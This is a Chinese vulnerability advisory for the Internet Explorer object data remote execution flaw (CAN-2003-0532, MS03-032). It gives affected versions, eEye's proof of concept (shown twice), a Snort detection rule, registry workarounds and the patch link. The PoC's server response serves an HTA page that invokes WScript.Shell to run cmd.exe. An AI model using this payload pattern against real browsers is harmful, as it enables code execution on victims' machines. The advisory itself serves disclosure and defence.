Microsoft Internet Explorer对象类型验证漏洞

发布时间：2003-08-20
更新时间：2003-09-02
严重程度：中
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：8456
CVE(CAN) ID：CAN-2003-0532

受影响系统

Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.0.1 SP1
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.0.1
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows 98SE
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5 SP2
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows 98SE
   -Microsoft Windows ME
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5 SP1
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   +Microsoft Windows ME
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 98
   -Microsoft Windows 98SE
   -Microsoft Windows ME
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0 SP6a
   +Microsoft Windows Server 2003 Datacenter Edition
   +Microsoft Windows Server 2003 Datacenter Edition 64-bit
   +Microsoft Windows Server 2003 Enterprise Edition
   +Microsoft Windows Server 2003 Enterprise Edition 64-bit
   +Microsoft Windows Server 2003 Standard Edition
   +Microsoft Windows Server 2003 Web Edition

详细描述
Internet Explorer实现上存在对象验证漏洞，当IE从服务器收到的页面中包含了一个已经解析过的对象时，对其将不在再进行验证，这可能导致一个恶意的对象被信任并在本地以当前用户的权限被运行。

测试代码
eEye提供如下的测试方法：

--------------Client HTTP request---------------------------
<html>
...
<object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
------------------------------------------------------------

-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191

<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
------------------------------------------------------------

                  Disclaimer | About The Vulnerability Database
     The following proof of concept example has been made available by eEye:

     --------------Client HTTP request---------------------------
     <html>
     ...
     <object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
     </object>
     </html>
     ------------------------------------------------------------

     -------------Server HTTP Response---------------------------
     HTTP/1.1 200 OK
     Date: Tue, 13 May 2003 18:06:43 GMT
     Server: Apache
     Content-Type: application/hta
     Content-Length: 191

     <html>
     <object id='wsh'
     classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
     <script>
     wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
     </script>
     </html>
     ------------------------------------------------------------

解决方案
Nerijus Krukauskas <nk99@delfi.lt>提供了如下的Snort规则来检测这种攻击：

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Internet Explorer Object Data Remote Execution Vulnerability"; content:"F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"; nocase; flow:from_server, established; reference:cve,CAN-2003-0532; classtype:web-application-activity; rev:1;)

Johan Persson <orm@SENTOR.SE>提供如下的临时解决方案：

Back up your registry.
Find and remove the 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' entry located in
HKEY_CLASSES_ROOT\typelib

Find and remove all references to Windows Scripting Host (wscript), such as:
Windows Script Host Network Object:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
WSHRemote:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6F201542-B482-11D2-A250-00104BD35090}
Windows Script Host Shell Object:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows Script Host Network Object:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}

厂商已经提供了补丁：

http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

相关信息
EEYE: Internet Explorer Object Data Remote Execution Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2003-08/0309.html

最近严重漏洞

Microsoft Internet Explorer对象类型验证漏洞